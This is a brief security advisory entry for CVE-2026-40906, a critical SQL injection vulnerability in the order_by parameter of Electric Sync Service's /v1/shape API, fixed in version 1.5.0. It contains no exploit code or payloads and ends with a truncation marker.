CRITICAL
electric-sql
CVE published 2026-04-21
CVE-2026-40906
CVE-2026-40906 is a critical SQL injection vulnerability in Electric Sync Service versions 1.1.12 to before 1.5.0. The vulnerability exists in the /v1/shape API's order_by parameter, allowing authenticated users to inject malicious SQL. This could enable them to read, write, and destroy the full contents of the underlying PostgreSQL database. The Electric SQL team has addressed this issue in version 1.5.0 [truncated]